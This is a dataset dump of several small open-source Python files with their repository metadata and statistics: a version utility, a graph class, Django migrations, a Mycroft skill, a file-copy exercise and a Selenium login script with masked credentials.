| 29.934783 | 107 | 0.732752 | 203 | 1,377 | 4.82266 | 0.384236 | 0.042901 | 0.045965 | 0.040858 | 0.073544 | 0.073544 | 0.073544 | 0 | 0 | 0 | 0 | 0.015517 | 0.157589 | 1,377 | 45 | 108 | 30.6 | 0.828448 | 0.339869 | 0 | 0 | 0 | 0 | 0.0625 | 0.037037 | 0 | 0 | 0 | 0 | 0.26087 | 1 | 0.26087 | false | 0 | 0.26087 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8aaccd61826b3b9dd2b747e7dc1a8a8bd4442788 | 817 | py | Python | runway/utils/_version.py | onicagroup/runway | d50cac0e4878ff0691943029aa4f5b85d426a3b0 | [
"Apache-2.0"
] | 134 | 2018-02-26T21:35:23.000Z | 2022-03-03T00:30:27.000Z | runway/utils/_version.py | onicagroup/runway | d50cac0e4878ff0691943029aa4f5b85d426a3b0 | [
"Apache-2.0"
] | 937 | 2018-03-08T22:04:35.000Z | 2022-03-30T12:21:47.000Z | runway/utils/_version.py | onicagroup/runway | d50cac0e4878ff0691943029aa4f5b85d426a3b0 | [
"Apache-2.0"
] | 70 | 2018-02-26T23:48:11.000Z | 2022-03-02T18:44:30.000Z | """Version utilities."""
from __future__ import annotations
import packaging.version
class Version(packaging.version.Version):
"""Customize packagining.version.Version."""
def __init__(self, version: str) -> None:
"""Instantiate class.
Args:
version: Version string. (e.g. 1.0.0, v1.0.0)
"""
self._original_text = version
super().__init__(version)
def __repr__(self) -> str:
"""Return repr."""
# this usage of super is required to reproduce the intended result in
# any subclasses of this class
# pylint: disable=super-with-arguments
return f"<Version('{super(Version, self).__str__()}')>"
def __str__(self) -> str:
"""Return the original version string."""
return self._original_text
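A quick usage sketch of the class above, re-declared here so the snippet runs on its own (only the methods needed for the demo are kept):

```python
import packaging.version

class Version(packaging.version.Version):
    """Subclass that remembers the original version string."""

    def __init__(self, version: str) -> None:
        self._original_text = version
        super().__init__(version)

    def __str__(self) -> str:
        return self._original_text

# the leading "v" is normalized away by packaging, but the
# subclass still reports the text it was constructed with
v = Version("v1.0.0")
print(str(v))      # original string, leading "v" intact
print(v.release)   # parsed numeric components
```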
| 27.233333 | 77 | 0.621787 | 93 | 817 | 5.16129 | 0.494624 | 0.0875 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00982 | 0.252142 | 817 | 29 | 78 | 28.172414 | 0.775777 | 0.388005 | 0 | 0 | 0 | 0 | 0.100897 | 0.056054 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.2 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8aacf07f9aa6c4af097f81cc81a36e4e2404c67c | 870 | py | Python | graph.py | gibbss21/Cayley | 121dc60e9ba70d81d446024bfe137c4a9043be9f | [
"MIT"
] | null | null | null | graph.py | gibbss21/Cayley | 121dc60e9ba70d81d446024bfe137c4a9043be9f | [
"MIT"
] | null | null | null | graph.py | gibbss21/Cayley | 121dc60e9ba70d81d446024bfe137c4a9043be9f | [
"MIT"
] | null | null | null | """
Authors: Justin Pusztay
Filename: graph.py
Project: Research for Irina Mazilu, Ph.D.
This file contains the graph class. Allows users to build their own graph.
"""
__author__ = "\n".join(['Justin Pusztay (pusztayj20@mail.wlu.edu)'])
__all__ = ['Graph']
from Cayley.abstractnetwork import *
class Graph(AbstractNetwork):
def __init__(self):
"""Creates the graph object."""
self.keys = list()
AbstractNetwork.__init__(self)
    def __eq__(self, other):
        """Need to look at Lambert's."""
        if self is other:
            return True
        if type(self) != type(other):
            return False
        # same type but different objects: compare the underlying graph mapping
        return self.graph == other.graph
    def nodeNumber(self):
        """Returns the total number of nodes in the graph."""
        return len(self.graph)
def getType(self):
"""Quick fix for MonteCarlo."""
return "Graph"
| 22.894737 | 74 | 0.609195 | 105 | 870 | 4.857143 | 0.657143 | 0.05098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00316 | 0.272414 | 870 | 37 | 75 | 23.513514 | 0.802528 | 0.332184 | 0 | 0 | 0 | 0 | 0.094033 | 0.045208 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.0625 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8aca5c7861d26f1d856b1e6a5d30cf4b942b150d | 1,215 | py | Python | ex23_4_Adv.py | royliu317/Code-of-Learn-Python-THW | b0cf29ca7961e06dff29ad8d969a3a2938ecbd21 | [
"MIT"
] | null | null | null | ex23_4_Adv.py | royliu317/Code-of-Learn-Python-THW | b0cf29ca7961e06dff29ad8d969a3a2938ecbd21 | [
"MIT"
] | null | null | null | ex23_4_Adv.py | royliu317/Code-of-Learn-Python-THW | b0cf29ca7961e06dff29ad8d969a3a2938ecbd21 | [
"MIT"
] | null | null | null | print("copy content from auto created ex23_sample_05.txt to ex23_sample_06.txt using 1 line only")
input('In powershell: echo "This is a unicode Test." > ex23_sample_05.txt ')
in_file = open('c:\\users\\roy\\ex23_sample_05.txt', encoding = 'utf-16').read()
out_file = open('c:\\users\\roy\\ex23_sample_06.txt', 'w', encoding = 'utf-16').write(in_file)
print("DONE!\n")
#-------------------------------------------------------------------
print("-------------------------------------------------------------")
print("copy content from languages.txt within ex23 to languages2.txt using 1 line only")
in_file = open('c:\\users\\roy\\languages.txt', encoding = 'utf-8').read()
# When set encoding = utf-16 --> UnicodeDecodeError: 'utf-16-le' codec can't decode bytes in position 812-813: illegal UTF-16 surrogate
# When set encoding = utf-16, errors = 'ignore' --> UnicodeError: UTF-16 stream does not start with BOM
out_file = open('c:\\users\\roy\\languages2.txt', 'w', encoding = 'utf-8').write(in_file)
# Before add encoding = utf-8 -->UnicodeEncodeError: 'gbk' codec can't encode character '\u0a73' in position 4: illegal multibyte sequence
print("DONE!\n")
# bytes can only contain ASCII literal characters. | 57.857143 | 138 | 0.642798 | 176 | 1,215 | 4.346591 | 0.454545 | 0.100654 | 0.047059 | 0.073203 | 0.224837 | 0.128105 | 0.070588 | 0 | 0 | 0 | 0 | 0.049029 | 0.110288 | 1,215 | 21 | 139 | 57.857143 | 0.658649 | 0.402469 | 0 | 0.2 | 0 | 0 | 0.638504 | 0.260388 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
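The codec errors recorded in the comments above all stem from reading or writing with a mismatched encoding; a minimal stdlib sketch of the same copy done safely, with temporary files standing in for the sample paths:

```python
import os
import tempfile

# write a file as UTF-16 (Python adds the BOM automatically)
src = tempfile.NamedTemporaryFile(mode='w', encoding='utf-16',
                                  suffix='.txt', delete=False)
src.write("This is a unicode Test.")
src.close()

# decoding must use the codec the file was actually written with
text = open(src.name, encoding='utf-16').read()

# re-encode on the way out; any target codec works once the text is decoded
dst = src.name + '.utf8'
open(dst, 'w', encoding='utf-8').write(text)

copied = open(dst, encoding='utf-8').read()
print(copied)
os.unlink(src.name)
os.unlink(dst)
```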
8acca2171f92073439bfaa4f9dd1220f87a67e36 | 478 | py | Python | app.py | ctlcltd/enigma2-channel-editor | 04add0519751dcda854b0cba89552cc31f6c0713 | [
"MIT"
] | null | null | null | app.py | ctlcltd/enigma2-channel-editor | 04add0519751dcda854b0cba89552cc31f6c0713 | [
"MIT"
] | null | null | null | app.py | ctlcltd/enigma2-channel-editor | 04add0519751dcda854b0cba89552cc31f6c0713 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# app.py
#
# @link https://github.com/ctlcltd/e2-sat-editor-qb
# @copyright e2 SAT Editor Team
# @author Leonardo Laureti
# @version 0.1
# @license MIT License
#
import sys
from config import *
from commons import debug
def main():
    debug('main()')

    # default so an unrecognized GUI_INTERFACE falls through to the else branch
    # instead of raising NameError on the check below
    gui = None
    if GUI_INTERFACE == 'tk':
        from gui_tk import gui
    elif GUI_INTERFACE == 'qt6':
        from gui_qt6 import gui

    if gui:
        gui()
    else:
        debug('sys exit')
if __name__ == '__main__':
main()
| 14.058824 | 52 | 0.658996 | 71 | 478 | 4.267606 | 0.591549 | 0.033003 | 0.072607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01847 | 0.207113 | 478 | 33 | 53 | 14.484848 | 0.781003 | 0.366109 | 0 | 0 | 0 | 0 | 0.092466 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | true | 0 | 0.333333 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
76d561ce14f12b85a9a97f20b040313b9f2366d4 | 130 | py | Python | fdf/__init__.py | Ledenel/fdf | df4d74a455046c35d7957e98155957b787c699d2 | [
"MIT"
] | 1 | 2020-07-02T16:42:33.000Z | 2020-07-02T16:42:33.000Z | fdf/__init__.py | Ledenel/fdf | df4d74a455046c35d7957e98155957b787c699d2 | [
"MIT"
] | 138 | 2020-07-16T05:03:37.000Z | 2022-03-28T23:26:50.000Z | fdf/__init__.py | Ledenel/fdf | df4d74a455046c35d7957e98155957b787c699d2 | [
"MIT"
] | null | null | null | """Top-level package for fdf."""
__author__ = """Ledenel Intelli"""
__email__ = 'ledenelintelli@gmail.com'
__version__ = '0.1.9'
| 21.666667 | 38 | 0.692308 | 16 | 130 | 4.875 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026087 | 0.115385 | 130 | 5 | 39 | 26 | 0.652174 | 0.2 | 0 | 0 | 0 | 0 | 0.44898 | 0.244898 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
76dc6702762a919aace831ff2e0c72b209fd4fe4 | 324 | py | Python | __init__.py | Noobiwankenobi/whyplessey-skill | 36d96567dcc5dbba7ceb7c257163300f7c7cfc72 | [
"MIT"
] | null | null | null | __init__.py | Noobiwankenobi/whyplessey-skill | 36d96567dcc5dbba7ceb7c257163300f7c7cfc72 | [
"MIT"
] | null | null | null | __init__.py | Noobiwankenobi/whyplessey-skill | 36d96567dcc5dbba7ceb7c257163300f7c7cfc72 | [
"MIT"
] | null | null | null | from mycroft import MycroftSkill, intent_file_handler
class Whyplessey(MycroftSkill):
def __init__(self):
MycroftSkill.__init__(self)
@intent_file_handler('whyplessey.intent')
def handle_whyplessey(self, message):
self.speak_dialog('whyplessey')
def create_skill():
return Whyplessey()
| 20.25 | 53 | 0.731481 | 35 | 324 | 6.342857 | 0.542857 | 0.09009 | 0.153153 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175926 | 324 | 15 | 54 | 21.6 | 0.831461 | 0 | 0 | 0 | 0 | 0 | 0.083591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.111111 | 0.111111 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
76e38e95db1dd82164581f6f1ccc9fa7fc3b5bb5 | 208 | py | Python | tests/test_condition.py | richshaw2015/behavior3py | bbb1aaef7698b776fe3ba87914ccede3b0b0dd52 | [
"MIT"
] | null | null | null | tests/test_condition.py | richshaw2015/behavior3py | bbb1aaef7698b776fe3ba87914ccede3b0b0dd52 | [
"MIT"
] | null | null | null | tests/test_condition.py | richshaw2015/behavior3py | bbb1aaef7698b776fe3ba87914ccede3b0b0dd52 | [
"MIT"
] | null | null | null | import b3
import unittest
class TestCondition(unittest.TestCase):
def test_category(self):
self.assertEqual(b3.Condition.category, b3.CONDITION)
if __name__ == '__main__':
unittest.main()
| 17.333333 | 61 | 0.725962 | 24 | 208 | 5.916667 | 0.625 | 0.15493 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017341 | 0.168269 | 208 | 11 | 62 | 18.909091 | 0.803468 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
76ed3de9b853ebdfc0bd75e4d1e562d796b887bf | 318 | py | Python | mocks/figures/permissions.py | appsembler/tahoe-figures | dbf7dcff4f207f0e5651f9190576b55d2eb5c189 | [
"MIT"
] | null | null | null | mocks/figures/permissions.py | appsembler/tahoe-figures | dbf7dcff4f207f0e5651f9190576b55d2eb5c189 | [
"MIT"
] | 2 | 2022-01-17T11:04:36.000Z | 2022-01-19T12:58:11.000Z | mocks/figures/permissions.py | appsembler/tahoe-figures-plugins | dbf7dcff4f207f0e5651f9190576b55d2eb5c189 | [
"MIT"
] | null | null | null | """
Mock for the figures.permissions model.
"""
def is_active_staff_or_superuser(request):
"""
Exact copy of Figures=0.4.x `figures.permissions.is_active_staff_or_superuser` helper.
"""
return request.user and request.user.is_active and (
request.user.is_staff or request.user.is_superuser)
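A small sketch exercising the helper above outside Django; the function is repeated verbatim so the snippet is self-contained, and `SimpleNamespace` stands in for a request object:

```python
from types import SimpleNamespace

def is_active_staff_or_superuser(request):
    """Copy of the helper above, repeated so the snippet runs on its own."""
    return request.user and request.user.is_active and (
        request.user.is_staff or request.user.is_superuser)

# an active staff user passes; a request with no user short-circuits to falsy
staff_req = SimpleNamespace(
    user=SimpleNamespace(is_active=True, is_staff=True, is_superuser=False))
anon_req = SimpleNamespace(user=None)

print(bool(is_active_staff_or_superuser(staff_req)))   # True
print(bool(is_active_staff_or_superuser(anon_req)))    # False
```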
| 24.461538 | 90 | 0.726415 | 46 | 318 | 4.782609 | 0.5 | 0.2 | 0.177273 | 0.136364 | 0.218182 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007547 | 0.166667 | 318 | 12 | 91 | 26.5 | 0.822642 | 0.396226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
76fe24ea8de3050267c2d299f69c85f862b65e29 | 11,479 | py | Python | website_analytics/migrations/0001_initial.py | dipapaspyros/bdo_platform | 336de07c6ed14290c54f2154117dbf90a187e4ea | [
"MIT"
] | 2 | 2018-02-07T10:26:28.000Z | 2018-09-21T09:12:58.000Z | website_analytics/migrations/0001_initial.py | dipapaspyros/bdo_platform | 336de07c6ed14290c54f2154117dbf90a187e4ea | [
"MIT"
] | 5 | 2018-09-21T10:40:44.000Z | 2019-04-06T10:59:57.000Z | website_analytics/migrations/0001_initial.py | dipapaspyros/bdo_platform | 336de07c6ed14290c54f2154117dbf90a187e4ea | [
"MIT"
] | 3 | 2019-06-09T15:42:02.000Z | 2022-02-14T19:50:33.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-07-16 13:27
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('visualizer', '0011_visualization_data_source'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('service_builder', '0024_auto_20190716_1627'),
('dashboard_builder', '0014_auto_20190716_1627'),
('aggregator', '0041_auto_20190716_1627'),
]
operations = [
migrations.CreateModel(
name='UniqueDashboardViewsView',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dashboard_id', models.IntegerField(default=1)),
('count', models.IntegerField(default=1)),
],
options={
'db_table': 'unique_dashboard_views_view',
'managed': False,
},
),
migrations.CreateModel(
name='UniqueDatasetPreview',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dataset_id', models.IntegerField(default=1)),
('count', models.IntegerField(default=1)),
],
options={
'db_table': 'unique_dataset_preview',
'managed': False,
},
),
migrations.CreateModel(
name='UniqueServiceUsesView',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('service_id', models.IntegerField(default=1)),
('count', models.IntegerField(default=1)),
],
options={
'db_table': 'unique_service_uses_view',
'managed': False,
},
),
migrations.CreateModel(
name='BDO_Plan',
fields=[
('plan_name', models.TextField(primary_key=True, serialize=False)),
('plan_title', models.TextField(default='Untitled Plan')),
('query_limit', models.IntegerField(default=120, null=True)),
('price', models.FloatField(default=0, null=True)),
('access_to_beta_services', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='DashboardDisplays',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dash_display_count', models.IntegerField(default=1)),
('dashboard', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dashboard_displays_dashboard', to='dashboard_builder.Dashboard')),
],
),
migrations.CreateModel(
name='DashboardUniqueViews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dash_display_count', models.IntegerField(default=1)),
('dashboard', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dashboard_unique_views_dashboard', to='dashboard_builder.Dashboard')),
('dashboard_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dashboard_unique_views_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='DatasetCombined',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('combination_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_combined_dataset', to='aggregator.Dataset')),
],
),
migrations.CreateModel(
name='DatasetExplored',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('exploration_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_explored_dataset', to='aggregator.Dataset')),
],
),
migrations.CreateModel(
name='DatasetPageViews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('preview_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_page_views_dataset', to='aggregator.Dataset')),
],
),
migrations.CreateModel(
name='DatasetUniqueViews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('preview_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_unique_views_dataset', to='aggregator.Dataset')),
('dataset_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_unique_views_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='DatasetUseInService',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('use_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_use_in_service_dataset', to='aggregator.Dataset')),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_use_in_service_service', to='service_builder.Service')),
],
),
migrations.CreateModel(
name='DatasetUseInVisualisation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('viz_use_count', models.IntegerField(default=1)),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_dataset_use_in_visualisation_dataset', to='aggregator.Dataset')),
],
),
migrations.CreateModel(
name='MareProtectionService',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('scenario', models.IntegerField(default=1)),
('simulation_length', models.IntegerField(default=24)),
('time_interval', models.IntegerField(default=2)),
('ocean_circulation_model', models.CharField(default='Poseidon High Resolution Aegean Model', max_length=100)),
('wave_model', models.CharField(default='Poseidon WAM Cycle 4 for the Aegean', max_length=100)),
('natura_layer', models.BooleanField(default=False)),
('ais_layer', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='ServicePerUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('service_runs', models.IntegerField(default=1)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='service_per_user_service', to='service_builder.Service')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='service_per_user_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ServiceUse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('serv_use_count', models.IntegerField(default=1)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_service_use_service', to='service_builder.Service')),
],
),
migrations.CreateModel(
name='ServiceUsers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('serv_use_count', models.IntegerField(default=1)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_service_users_service', to='service_builder.Service')),
('service_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_service_users_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='UserPlans',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_start', models.DateTimeField(auto_now_add=True)),
('date_end', models.DateTimeField(default=datetime.datetime(2019, 8, 15, 16, 27, 30, 138000))),
('active', models.BooleanField(default=True)),
('auto_renewal', models.BooleanField(default=True)),
('query_count', models.IntegerField(default=0)),
('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='plan_plan', to='website_analytics.BDO_Plan')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='plan_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='VisualisationTypeUses',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('viz_use_count', models.IntegerField(default=1)),
('visualisation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_visualisation_type_uses_visualisation', to='visualizer.Visualization')),
],
),
migrations.CreateModel(
name='WaveEnergyResourceAssessment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dataset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_nester_statistics_dataset', to='aggregator.Dataset')),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='analytics_nester_statistics_service', to='service_builder.Service')),
],
),
]
| 55.723301 | 193 | 0.621308 | 1,124 | 11,479 | 6.108541 | 0.152135 | 0.026799 | 0.083746 | 0.070492 | 0.742645 | 0.685698 | 0.673755 | 0.644043 | 0.628022 | 0.605301 | 0 | 0.014001 | 0.247147 | 11,479 | 205 | 194 | 55.995122 | 0.780491 | 0.00575 | 0 | 0.563452 | 1 | 0 | 0.207888 | 0.10929 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025381 | 0 | 0.045685 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a00d3d1412e7fc414904354849563644c4fd535 | 780 | py | Python | login.py | JayGao1219/crawler | 8a2d0b949b0dcfda7a8f2f02c66bd635e7035516 | [
"MIT"
] | null | null | null | login.py | JayGao1219/crawler | 8a2d0b949b0dcfda7a8f2f02c66bd635e7035516 | [
"MIT"
] | null | null | null | login.py | JayGao1219/crawler | 8a2d0b949b0dcfda7a8f2f02c66bd635e7035516 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'a login model'
__author__='Jay Gao 1219'
from selenium import webdriver;
login_url='https://www.itjuzi.com/user/login'
def login(Explorer,flag):#flag表示是否是第一次调用
if flag==False:
Explorer.find_element_by_id('loginurl').click()
pass;
else:
Explorer.get(login_url)
pass;
Explorer.implicitly_wait(30)
Explorer.find_element_by_css_selector('input[name="identity"]').send_keys("136xxxx4019")
Explorer.find_element_by_css_selector('input[name="password"]').send_keys("xxxxxxxxx")
Explorer.find_element_by_id('login_btn').click()
pass;
if __name__=='__main__':
Explorer=webdriver.Chrome();
login(Explorer,True)
print("login succeed")
Explorer.quit()
pass;
| 25.16129 | 92 | 0.691026 | 100 | 780 | 5.07 | 0.59 | 0.094675 | 0.149901 | 0.16568 | 0.252465 | 0.161736 | 0.161736 | 0.161736 | 0 | 0 | 0 | 0.022936 | 0.161538 | 780 | 30 | 93 | 26 | 0.752294 | 0.091026 | 0 | 0.181818 | 0 | 0 | 0.222222 | 0.061111 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0.227273 | 0.045455 | 0 | 0.090909 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0a08ca58cb90999e2abd0782db446fdc2d440ebb | 473 | py | Python | apps/publications/migrations/0028_title_uris_proprietary_ids.py | techlib/czechelib-stats | ca132e326af0924740a525710474870b1fb5fd37 | [
"MIT"
] | 1 | 2019-12-12T15:38:42.000Z | 2019-12-12T15:38:42.000Z | apps/publications/migrations/0028_title_uris_proprietary_ids.py | techlib/czechelib-stats | ca132e326af0924740a525710474870b1fb5fd37 | [
"MIT"
] | null | null | null | apps/publications/migrations/0028_title_uris_proprietary_ids.py | techlib/czechelib-stats | ca132e326af0924740a525710474870b1fb5fd37 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.12 on 2022-02-24 09:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('publications', '0027_fill_platform_name'),
]
operations = [
migrations.AddField(
model_name='title', name='proprietary_ids', field=models.JSONField(default=list),
),
migrations.AddField(model_name='title', name='uris', field=models.JSONField(default=list)),
]
| 26.277778 | 99 | 0.663848 | 54 | 473 | 5.703704 | 0.666667 | 0.116883 | 0.149351 | 0.175325 | 0.435065 | 0.233766 | 0 | 0 | 0 | 0 | 0 | 0.053333 | 0.207188 | 473 | 17 | 100 | 27.823529 | 0.768 | 0.097252 | 0 | 0 | 1 | 0 | 0.150588 | 0.054118 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a137894f7810106cb2152e1863769e27f2e6b4c | 19,445 | py | Python | yaml/init-scripts/setup_npu.py | Asteven-zn/ApulisInstall | a34ca7bbd2ce733014772958c7eac4651c173032 | [
"MIT"
